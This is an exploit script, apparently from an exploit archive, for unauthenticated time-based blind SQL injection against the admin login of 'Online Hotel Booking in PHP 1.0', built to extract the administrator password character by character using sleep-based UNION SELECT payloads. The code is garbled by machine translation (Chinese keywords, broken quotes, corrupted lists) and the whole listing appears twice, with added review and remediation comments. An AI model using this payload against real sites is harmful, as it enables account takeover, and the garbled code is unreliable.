# Exploit Title: Online Hotel Booking in PHP 1.0 - Blind SQL Injection (Unauthenticated)
# Google Dork: N/A
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : N/A
导入请求
导入argparse
从Colorama Import(fore as F,Back as B Back as B,样式为S)
# NOTE(review): this listing passed through machine translation. Keywords, identifiers and
# literals are garbled, so the text is not valid Python as shown.
# Colour/style aliases built from the colorama names imported above.
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,SB,FW=B.Red,F.Reset,F.Red,F.Red,F.Green,F.yellow,F.Blue,F.Magenta,F.Magenta,F.Cycyan,f.cyan,S.Reset_Reset_AlseT_Reset_All,S.Dim,S.Dim,S.Dim,S.Bright,F.White
# Silences urllib3's insecure-request warning. The POST helper further down passes
# verify=false, so TLS certificate validation is off for the requests this script sends.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.insecurreequestwarning)
# Proxy map for both schemes, pointing at a loopback-style address (address and port are
# garbled in this copy). Presumably a local intercepting proxy used while testing - confirm.
proxies={'http':'http://127.0.0.0.1:808080','https':'http://127.0.0.13:808080808080808080808080'}
# Command-line interface: a single URL option (its help text is empty) naming the base URL
# of the installation under test.
Parser=argparse.argumentParser(Description='漏洞盲sql注入')
parser.add_argument(' - u',' - url',help='')
args=parser.parse_args()
def Banner():
# Prints a red ASCII-art banner with the author's GitHub link, then switches the
# terminal colour to white. Cosmetic only: it takes no input and sends no traffic.
# NOTE(review): the art inside the string is corrupted in this copy.
打印(f'''{fr}
马云惹不起马云▄▄▄马云惹不起马云▄▄▄。 ▄▄马云惹不起马云马云惹不起马云▄▄▄▄▄▄▄▄▪马云惹不起马云▄▄▄▄
▪▐▄▄马云惹不起马云▐▄▄马云惹不起马云▐█▐█。 ▀▄。
▄█▀▄██■■■▄██▄██马云惹不起马云▐█▌▐▀▀▄▐█▌▐▀▀▄马云惹不起马云▐█
▐█▌。 ██•█▌▐█▌▐▌▐█▌██。 ██
▀█▄▀▪▀▀▀▀▀▀•▀▀▀•。
github: https://github.com/offvision-droid
{FW}
''))
# Define the characters to test: the candidate alphabet tried at each position of the
# value being inferred.
# NOTE(review): the list is corrupted in this copy (unbalanced quotes, repeated and empty
# entries, and the closing bracket replaced by stray text). Presumably it held letters,
# digits, '@' and '#' - confirm against the original listing.
chars=[
'a','b','c','d','e','f','g','h','i','','j',k','k','l','m','m','n','n','n','o',o',o',o',o',
'p','q','r','s','t','u','v','w','x','y','',z','a','a','b','b','c','c',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d','
'e','f','g','h','i','j','k','l','m','n','n','o',p','q','q','q','r',s',s',s',s',s',
't','u','v','w','x','y','z','0','1','1','2','3','4','4','5','5','6','6','7',7',
'8','9','@','#'
这是给出的
def sqlipayload(char,position,userId,列,表):
# Builds the string that the POST helper places in the login form's password field: a
# time-based blind SQL injection probe. The visible fragments form a UNION SELECT whose
# IF() compares one character of the column (SUBSTRING at the given position, length 1)
# with `char`, calls sleep(3) on a match and yields null otherwise. The table name and a
# uname='admin' filter are appended at the end.
# `userId` is accepted but never used in the body.
# NOTE(review): quotes are unbalanced and the parameter names no longer match the names
# used in the body, so the function is not runnable as shown in this copy.
# Defensive reading: the probe only has an effect if the login page concatenates the
# password field into its SQL text. login.php is not shown here; binding the field as a
# parameter of a prepared statement would remove the injection point.
sqli='admin \'联合选择if(substring(')
sqli +=str(列) +','
sqli +=str(位置) +',1)=\''
sqli +=str(char) +'\',sleep(3),null)
sqli +=str(table) +'其中uname='admin'\''
返回sqli
def poStrequrest(url,sqlireq,char,位置):
# Sends one login POST with the probe string in the password field and uses the response
# time as the only signal. Returns `char` when the elapsed-time test passes, else ''.
# The request is sent with certificate verification off, through the module-level proxy
# map, with a 10-second timeout.
# NOTE(review): the comparison operator against 2 seconds is missing in this copy;
# presumably `>=` - confirm. A single timing sample decides each guess, so ordinary
# latency above the threshold would be read as a match.
# Detection note: every guess is a separate POST to the admin login endpoint for user
# 'admin', so a run appears in access logs as a burst of login attempts, some of them
# delayed by roughly the sleep interval.
sqliurl=url
params={'emailusername':'admin','password': sqlireq,'submit':'login'}
req=requests.post(url=sqliurl,data=params,verify=false,prexies=perxies,timeout=10)
如果req.elapsed.total_seconds()=2:
print('{} : {}'。格式(char,req.elapsed.total_seconds()))
返回char
返回''
Def Theharvester(Target,Chars,url):
# Drives the character-by-character inference: starting at position 1, it builds a probe
# for each candidate character, sends it through the POST helper, appends whatever the
# helper returns to the result string, and finally returns that string.
# NOTE(review): both loop headers are garbled in this copy (the bound check against 5
# lost its operator and the inner loop header is unreadable); presumably
# `while position < 5` and `for char in chars` - confirm against the original.
# Indentation is lost, so loop nesting and any early exit cannot be confirmed from here.
# The status print applies .format() to a string without placeholders, so the
# table/column/id arguments never appear in the output.
#print('retieving: {} {} {} {}'。格式(target ['table'],target ['column'],target ['id'']))
打印('检索管理员password'.format(target ['table'],target ['列'],target ['id'])))))
位置=1
full_pass=''
而位置5:
char中的char :
sqlireq=sqlipayload(char,position,target ['id'],target ['列'],target ['table'])
und_char=postrequest(url,sqlireq,char,位置)
full_pass +=找到_char
位置+=1
返回full_pass
# Entry point: prints the banner, appends the admin login path to the URL given on the
# command line, runs the inference for the `upass` column of the `Manager` table and
# prints the result as the administrator password.
# NOTE(review): the guard and the path literal were machine-translated; in this form the
# path segment is not a path of the application and the guard never matches.
# Remediation pointers for the affected application (its source is not shown here, so
# verify against it): use prepared statements in the admin login query, and store
# password hashes rather than a directly usable `upass` value.
如果name=='__ -Main __':
横幅()
主机=str(args.url)
路径=主机+'/酒店预订/admin/login.php'
AdminPassword={'ID':'1','table':'Manager','column':'upass'}
AdminPass=Theharvester(AdminPassword,chars,Path)
打印(“管理员密码:”,AdminPass)
# Google Dork: N/A
# Date: 04/02/2024
# Exploit Author: Gian Paris C. Agsam
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
# Version: 1.0
# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
# CVE : N/A
导入请求
导入argparse
从Colorama Import(fore as F,Back as B Back as B,样式为S)
# NOTE(review): this listing passed through machine translation. Keywords, identifiers and
# literals are garbled, so the text is not valid Python as shown.
# Colour/style aliases built from the colorama names imported above.
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,SB,FW=B.Red,F.Reset,F.Red,F.Red,F.Green,F.yellow,F.Blue,F.Magenta,F.Magenta,F.Cycyan,f.cyan,S.Reset_Reset_AlseT_Reset_All,S.Dim,S.Dim,S.Dim,S.Bright,F.White
# Silences urllib3's insecure-request warning. The POST helper further down passes
# verify=false, so TLS certificate validation is off for the requests this script sends.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.insecurreequestwarning)
# Proxy map for both schemes, pointing at a loopback-style address (address and port are
# garbled in this copy). Presumably a local intercepting proxy used while testing - confirm.
proxies={'http':'http://127.0.0.0.1:808080','https':'http://127.0.0.13:808080808080808080808080'}
# Command-line interface: a single URL option (its help text is empty) naming the base URL
# of the installation under test.
Parser=argparse.argumentParser(Description='漏洞盲sql注入')
parser.add_argument(' - u',' - url',help='')
args=parser.parse_args()
def Banner():
# Prints a red ASCII-art banner with the author's GitHub link, then switches the
# terminal colour to white. Cosmetic only: it takes no input and sends no traffic.
# NOTE(review): the art inside the string is corrupted in this copy.
打印(f'''{fr}
马云惹不起马云▄▄▄马云惹不起马云▄▄▄。 ▄▄马云惹不起马云马云惹不起马云▄▄▄▄▄▄▄▄▪马云惹不起马云▄▄▄▄
▪▐▄▄马云惹不起马云▐▄▄马云惹不起马云▐█▐█。 ▀▄。
▄█▀▄██■■■▄██▄██马云惹不起马云▐█▌▐▀▀▄▐█▌▐▀▀▄马云惹不起马云▐█
▐█▌。 ██•█▌▐█▌▐▌▐█▌██。 ██
▀█▄▀▪▀▀▀▀▀▀•▀▀▀•。
github: https://github.com/offvision-droid
{FW}
''))
# Define the characters to test: the candidate alphabet tried at each position of the
# value being inferred.
# NOTE(review): the list is corrupted in this copy (unbalanced quotes, repeated and empty
# entries, and the closing bracket replaced by stray text). Presumably it held letters,
# digits, '@' and '#' - confirm against the original listing.
chars=[
'a','b','c','d','e','f','g','h','i','','j',k','k','l','m','m','n','n','n','o',o',o',o',o',
'p','q','r','s','t','u','v','w','x','y','',z','a','a','b','b','c','c',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d',d','
'e','f','g','h','i','j','k','l','m','n','n','o',p','q','q','q','r',s',s',s',s',s',
't','u','v','w','x','y','z','0','1','1','2','3','4','4','5','5','6','6','7',7',
'8','9','@','#'
这是给出的
def sqlipayload(char,position,userId,列,表):
# Builds the string that the POST helper places in the login form's password field: a
# time-based blind SQL injection probe. The visible fragments form a UNION SELECT whose
# IF() compares one character of the column (SUBSTRING at the given position, length 1)
# with `char`, calls sleep(3) on a match and yields null otherwise. The table name and a
# uname='admin' filter are appended at the end.
# `userId` is accepted but never used in the body.
# NOTE(review): quotes are unbalanced and the parameter names no longer match the names
# used in the body, so the function is not runnable as shown in this copy.
# Defensive reading: the probe only has an effect if the login page concatenates the
# password field into its SQL text. login.php is not shown here; binding the field as a
# parameter of a prepared statement would remove the injection point.
sqli='admin \'联合选择if(substring(')
sqli +=str(列) +','
sqli +=str(位置) +',1)=\''
sqli +=str(char) +'\',sleep(3),null)
sqli +=str(table) +'其中uname='admin'\''
返回sqli
def poStrequrest(url,sqlireq,char,位置):
# Sends one login POST with the probe string in the password field and uses the response
# time as the only signal. Returns `char` when the elapsed-time test passes, else ''.
# The request is sent with certificate verification off, through the module-level proxy
# map, with a 10-second timeout.
# NOTE(review): the comparison operator against 2 seconds is missing in this copy;
# presumably `>=` - confirm. A single timing sample decides each guess, so ordinary
# latency above the threshold would be read as a match.
# Detection note: every guess is a separate POST to the admin login endpoint for user
# 'admin', so a run appears in access logs as a burst of login attempts, some of them
# delayed by roughly the sleep interval.
sqliurl=url
params={'emailusername':'admin','password': sqlireq,'submit':'login'}
req=requests.post(url=sqliurl,data=params,verify=false,prexies=perxies,timeout=10)
如果req.elapsed.total_seconds()=2:
print('{} : {}'。格式(char,req.elapsed.total_seconds()))
返回char
返回''
Def Theharvester(Target,Chars,url):
# Drives the character-by-character inference: starting at position 1, it builds a probe
# for each candidate character, sends it through the POST helper, appends whatever the
# helper returns to the result string, and finally returns that string.
# NOTE(review): both loop headers are garbled in this copy (the bound check against 5
# lost its operator and the inner loop header is unreadable); presumably
# `while position < 5` and `for char in chars` - confirm against the original.
# Indentation is lost, so loop nesting and any early exit cannot be confirmed from here.
# The status print applies .format() to a string without placeholders, so the
# table/column/id arguments never appear in the output.
#print('retieving: {} {} {} {}'。格式(target ['table'],target ['column'],target ['id'']))
打印('检索管理员password'.format(target ['table'],target ['列'],target ['id'])))))
位置=1
full_pass=''
而位置5:
char中的char :
sqlireq=sqlipayload(char,position,target ['id'],target ['列'],target ['table'])
und_char=postrequest(url,sqlireq,char,位置)
full_pass +=找到_char
位置+=1
返回full_pass
# Entry point: prints the banner, appends the admin login path to the URL given on the
# command line, runs the inference for the `upass` column of the `Manager` table and
# prints the result as the administrator password.
# NOTE(review): the guard and the path literal were machine-translated; in this form the
# path segment is not a path of the application and the guard never matches.
# Remediation pointers for the affected application (its source is not shown here, so
# verify against it): use prepared statements in the admin login query, and store
# password hashes rather than a directly usable `upass` value.
如果name=='__ -Main __':
横幅()
主机=str(args.url)
路径=主机+'/酒店预订/admin/login.php'
AdminPassword={'ID':'1','table':'Manager','column':'upass'}
AdminPass=Theharvester(AdminPassword,chars,Path)
打印(“管理员密码:”,AdminPass)